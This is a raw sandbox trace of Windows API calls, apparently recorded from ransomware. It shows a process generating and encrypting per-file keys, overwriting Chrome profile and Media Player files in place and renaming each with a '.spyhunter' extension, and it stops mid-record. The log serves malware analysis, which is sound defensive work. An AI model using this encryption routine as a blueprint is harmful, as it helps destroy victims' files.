[0138.096] GetProcessHeap () returned 0x2c0000 [0138.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0138.096] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f190*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f190*=0x30) returned 1 [0138.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0138.097] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json") returned 167 [0138.097] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0138.097] GetProcessHeap () returned 0x2c0000 [0138.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0138.097] ReadFile (in: hFile=0x184, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f154, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f154*=0x2800, lpOverlapped=0x0) returned 1 [0138.174] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.174] WriteFile (in: hFile=0x184, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f154, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f154*=0x2800, lpOverlapped=0x0) returned 1 [0138.229] GetProcessHeap () returned 0x2c0000 [0138.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0138.229] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.229] WriteFile (in: hFile=0x184, lpBuffer=0x270f194*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f154, lpOverlapped=0x0 | out: lpBuffer=0x270f194*, lpNumberOfBytesWritten=0x270f154*=0x4, lpOverlapped=0x0) returned 1 [0138.229] WriteFile (in: hFile=0x184, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f154, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f154*=0x30, lpOverlapped=0x0) returned 1 [0138.229] CloseHandle (hObject=0x184) returned 1 [0138.229] GetProcessHeap () returned 0x2c0000 [0138.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0138.229] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json.spyhunter") returned 177 [0138.229] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json.spyhunter")) returned 1 [0138.230] GetProcessHeap () returned 0x2c0000 [0138.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0138.230] GetProcessHeap () returned 0x2c0000 [0138.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0138.230] GetProcessHeap () returned 0x2c0000 [0138.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe5538 | out: hHeap=0x2c0000) returned 1 [0138.273] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f190 | out: pbBuffer=0x270f190) returned 1 [0138.273] GetProcessHeap () returned 0x2c0000 [0138.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0138.273] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f188*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f188*=0x30) returned 1 [0138.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0138.274] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal") returned 96 [0138.274] StrStrW (lpFirst="Web Data-journal", lpSrch=".txt") returned 0x0 [0138.274] GetProcessHeap () returned 0x2c0000 [0138.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0138.274] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f14c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f14c*=0x0, lpOverlapped=0x0) returned 1 [0138.274] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.274] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x270f14c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f14c*=0x0, lpOverlapped=0x0) returned 1 [0138.274] GetProcessHeap () returned 0x2c0000 [0138.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0138.274] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.274] WriteFile (in: hFile=0x154, lpBuffer=0x270f18c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f14c, lpOverlapped=0x0 | out: lpBuffer=0x270f18c*, lpNumberOfBytesWritten=0x270f14c*=0x4, lpOverlapped=0x0) returned 1 [0138.275] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f14c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f14c*=0x30, lpOverlapped=0x0) returned 1 [0138.276] CloseHandle (hObject=0x154) returned 1 [0138.276] GetProcessHeap () returned 0x2c0000 [0138.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0138.277] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal.spyhunter") returned 106 [0138.277] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data-journal.spyhunter")) returned 1 [0138.278] GetProcessHeap () returned 0x2c0000 [0138.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0138.278] GetProcessHeap () returned 0x2c0000 [0138.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0138.278] GetProcessHeap () returned 0x2c0000 [0138.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2a6f0 | out: hHeap=0x2c0000) returned 1 [0138.278] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f188 | out: pbBuffer=0x270f188) returned 1 [0138.278] GetProcessHeap () returned 0x2c0000 [0138.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0138.278] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f180*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f180*=0x30) returned 1 [0138.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0138.281] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 88 [0138.281] StrStrW (lpFirst="Web Data", lpSrch=".txt") returned 0x0 [0138.281] GetProcessHeap () returned 0x2c0000 [0138.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0138.281] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f144, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f144*=0x2800, lpOverlapped=0x0) returned 1 [0138.290] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.290] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f144, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f144*=0x2800, lpOverlapped=0x0) returned 1 [0138.290] GetProcessHeap () returned 0x2c0000 [0138.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0138.290] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.290] WriteFile (in: hFile=0x154, lpBuffer=0x270f184*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f144, lpOverlapped=0x0 | out: lpBuffer=0x270f184*, lpNumberOfBytesWritten=0x270f144*=0x4, lpOverlapped=0x0) returned 1 [0138.290] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f144, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f144*=0x30, lpOverlapped=0x0) returned 1 [0138.290] CloseHandle (hObject=0x154) returned 1 [0138.330] GetProcessHeap () returned 0x2c0000 [0138.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.330] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.spyhunter") returned 98 [0138.330] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data.spyhunter")) returned 1 [0138.331] GetProcessHeap () returned 0x2c0000 [0138.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.331] GetProcessHeap () returned 0x2c0000 [0138.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0138.331] GetProcessHeap () returned 0x2c0000 [0138.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45028 | out: hHeap=0x2c0000) returned 1 [0138.331] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f188 | out: pbBuffer=0x270f188) returned 1 [0138.331] GetProcessHeap () returned 0x2c0000 [0138.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0138.331] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f180*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f180*=0x30) returned 1 [0138.331] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0138.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs") returned 97 [0138.331] StrStrW (lpFirst="Safe Browsing Channel IDs", lpSrch=".txt") returned 0x0 [0138.331] GetProcessHeap () returned 0x2c0000 [0138.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0138.331] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f144, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f144*=0x1400, lpOverlapped=0x0) returned 1 [0138.403] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffec00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.403] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x270f144, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f144*=0x1400, lpOverlapped=0x0) returned 1 [0138.403] GetProcessHeap () returned 0x2c0000 [0138.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0138.403] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.403] WriteFile (in: hFile=0xb4, lpBuffer=0x270f184*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f144, lpOverlapped=0x0 | out: lpBuffer=0x270f184*, lpNumberOfBytesWritten=0x270f144*=0x4, lpOverlapped=0x0) returned 1 [0138.403] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f144, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f144*=0x30, lpOverlapped=0x0) returned 1 [0138.403] CloseHandle (hObject=0xb4) returned 1 [0138.404] GetProcessHeap () returned 0x2c0000 [0138.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.404] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs.spyhunter") returned 107 [0138.404] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids.spyhunter")) returned 1 [0138.404] GetProcessHeap () returned 0x2c0000 [0138.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.404] GetProcessHeap () returned 0x2c0000 [0138.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0138.405] GetProcessHeap () returned 0x2c0000 [0138.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2aa38 | out: hHeap=0x2c0000) returned 1 [0138.405] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f180 | out: pbBuffer=0x270f180) returned 1 [0138.405] GetProcessHeap () returned 0x2c0000 [0138.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0138.405] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f178*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f178*=0x30) returned 1 [0138.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0138.405] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico") returned 150 [0138.405] StrStrW (lpFirst="Google Docs.ico", lpSrch=".txt") returned 0x0 [0138.405] GetProcessHeap () returned 0x2c0000 [0138.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0138.406] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f13c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f13c*=0x2800, lpOverlapped=0x0) returned 1 [0138.456] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.456] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f13c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f13c*=0x2800, lpOverlapped=0x0) returned 1 [0138.456] GetProcessHeap () returned 0x2c0000 [0138.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0138.456] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.456] WriteFile (in: hFile=0xb4, lpBuffer=0x270f17c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f13c, lpOverlapped=0x0 | out: lpBuffer=0x270f17c*, lpNumberOfBytesWritten=0x270f13c*=0x4, lpOverlapped=0x0) returned 1 [0138.457] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f13c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f13c*=0x30, lpOverlapped=0x0) returned 1 [0138.458] CloseHandle (hObject=0xb4) returned 1 [0138.479] GetProcessHeap () returned 0x2c0000 [0138.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.479] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.spyhunter") returned 160 [0138.479] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.spyhunter")) returned 1 [0138.480] GetProcessHeap () returned 0x2c0000 [0138.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.480] GetProcessHeap () returned 0x2c0000 [0138.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0138.480] GetProcessHeap () returned 0x2c0000 [0138.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f262a8 | out: hHeap=0x2c0000) returned 1 [0138.480] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f180 | out: pbBuffer=0x270f180) returned 1 [0138.480] GetProcessHeap () returned 0x2c0000 [0138.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0138.480] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f178*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f178*=0x30) returned 1 [0138.480] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0138.542] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl") returned 120 [0138.542] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".txt") returned 0x0 [0138.542] GetProcessHeap () returned 0x2c0000 [0138.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0138.542] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f13c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f13c*=0x249, lpOverlapped=0x0) returned 1 [0138.543] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffdb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.543] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x249, lpNumberOfBytesWritten=0x270f13c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f13c*=0x249, lpOverlapped=0x0) returned 1 [0138.543] GetProcessHeap () returned 0x2c0000 [0138.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0138.544] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.544] WriteFile (in: hFile=0x158, lpBuffer=0x270f17c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f13c, lpOverlapped=0x0 | out: lpBuffer=0x270f17c*, lpNumberOfBytesWritten=0x270f13c*=0x4, lpOverlapped=0x0) returned 1 [0138.544] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f13c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f13c*=0x30, lpOverlapped=0x0) returned 1 [0138.544] CloseHandle (hObject=0x158) returned 1 [0138.544] GetProcessHeap () returned 0x2c0000 [0138.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.544] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.spyhunter") returned 130 [0138.544] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" 